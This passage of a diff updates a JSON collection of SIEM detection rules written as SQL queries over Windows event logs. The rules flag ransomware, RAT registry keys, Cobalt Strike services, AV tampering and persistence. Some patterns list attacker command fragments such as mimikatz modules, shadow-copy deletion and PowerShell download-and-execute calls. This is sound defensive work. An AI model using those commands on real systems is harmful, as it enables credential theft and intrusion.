AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "status": "experimental", + "description": "Detects COM object hijacking via TreatAs subkey", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Maybe some system utilities in rare cases use linking keys for backward compatibility" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_add_persistence_com_key_linking.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1112" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Suspicious Add Scheduled Task Parent", - "id": "9494479d-d994-40bf-a8b1-eea890237021", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_parent.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "title": "Potential Persistence Via Disk Cleanup Handler - Registry", + "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence" ], "falsepositives": [ - "Command lines that use the same flags" + "Legitimate new entry added by windows" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" }, { - "title": "Exports Registry Key To a File", - "id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", - "status": "test", - "description": "Detects the export of the target Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "id": "480421f9-417f-4d3b-9552-fd2728443ec8", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate export of keys" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\')) AND ((CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((NewValue LIKE '(Empty)' ESCAPE '\\' OR NewValue LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_export_keys.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" }, { - "title": "Stop Windows Service Via PowerShell Stop-Service", - "id": "c49c5062-0966-4170-9efd-9968c913a6cf", - "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "status": "test", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" + "Unknown" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND CommandLine LIKE '%Stop-Service %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_stop_service.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1562.001" ], + "falsepositives": [ + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "Execute Code with Pester.bat", - "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "title": "Disable Administrative Share Creation at Startup", + "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "status": "test", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "Julia Fomina, oscd.community", + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1216" + "attack.t1070.005" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_pester_1.yml" + "filename": "registry_set_disable_administrative_share.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook Task/Note Reminder Received", + "id": "fc06e655-d98c-412f-ac76-05c2698b1cb2", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Legitimate reminders received for a task or a note will also trigger this rule." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Tasks\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Notes\\\\%' ESCAPE '\\') AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", - "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "title": "Internet Explorer Autorun Keys Modification", + "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine 